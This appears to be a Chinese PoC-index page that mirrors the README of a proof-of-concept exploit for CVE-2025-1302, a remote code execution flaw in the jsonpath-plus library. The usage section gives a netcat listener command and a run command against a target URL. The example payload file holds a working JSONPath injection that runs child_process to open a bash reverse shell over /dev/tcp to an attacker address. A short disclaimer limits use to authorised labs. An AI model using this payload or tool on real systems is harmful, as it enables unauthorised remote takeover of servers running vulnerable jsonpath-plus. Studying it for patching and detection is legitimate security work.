POC详情: d156ca8a63881b4a9a3db53db8332072774dc949

来源
https://github.com/abrewer251/CVE-2025-1302_jsonpath-plus_RCE
关联漏洞
标题: JSONPath Plus 安全漏洞 (CVE-2025-1302)
描述:JSONPath Plus是JSONPath Plus开源的一个库。 JSONPath Plus 10.3.0之前版本存在安全漏洞,该漏洞源于存在输入净化不当及不安全默认模式,会导致远程代码执行。
描述
PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
介绍
## CVE-2025-1302 JSONPath-Plus RCE PoC

**PoC Script Name:** `poc.py`

A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the `jsonpath-plus` library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.

---

### Features

* **Flexible HTTP methods**: Supports **POST**, **GET**, or **AUTO** (POST with GET fallback) via `--method` or `--no-fallback` flags.
* **Custom payloads**: Load one or more JSONPath RCE payload templates from a file, with `{ip}` and `{port}` templating.
* **Built-in default payload**: If no payload file is provided, uses a fully-formed bash reverse shell template.
* **Verbose debugging**: Prints full request/response bodies for both POST and GET attempts when they fail.
* **Progress indicators**: Displays delay and payload loops with `tqdm` progress bars.
* **Logging**: Optionally save all results to a JSON file with `--output`.

### Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/yourorg/jsonpath-rce-poc.git
   cd jsonpath-rce-poc
   ```

2. Install dependencies (requires Python 3.6+):

   ```bash
   pip install -r requirements.txt
   ```

### Usage

1. Start a listener on your attacker machine (replace port as needed):

   ```bash
   nc -lvnp 9999
   ```

2. Run the PoC:

   ```bash
   python3 poc.py \
     --url http://TARGET_HOST:PORT/query \
     --ip ATTACKER_IP --port 9999 \
     [--payload-file payloads.txt] \
     [--delay 5] \
     [--method AUTO|POST|GET] \
     [--no-fallback] \
     [--output results.json]
   ```

* **`--payload-file`**: File containing one JSONPath payload per line. Use `{ip}` and `{port}` placeholders.
* **`--delay`**: Seconds to wait before sending payloads (shows countdown).
* **`--method`**: Force `POST`, `GET`, or `AUTO` (default).
* **`--no-fallback`**: Shorthand to skip any GET retry (equivalent to `--method POST`).
* **`--output`**: Path to save JSON log of attempts.

### Example Payload File

```text
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
```

### Contribution

1. Fork the repo and create a feature branch.
2. Submit a pull request with your changes.

### Disclaimer

Use this script **only** in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.
文件快照

 [4.0K]  /data/pocs/d156ca8a63881b4a9a3db53db8332072774dc949
├── [1.0K]  LICENSE
├── [ 289]  package.json
├── [4.4K]  poc.py
└── [2.4K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。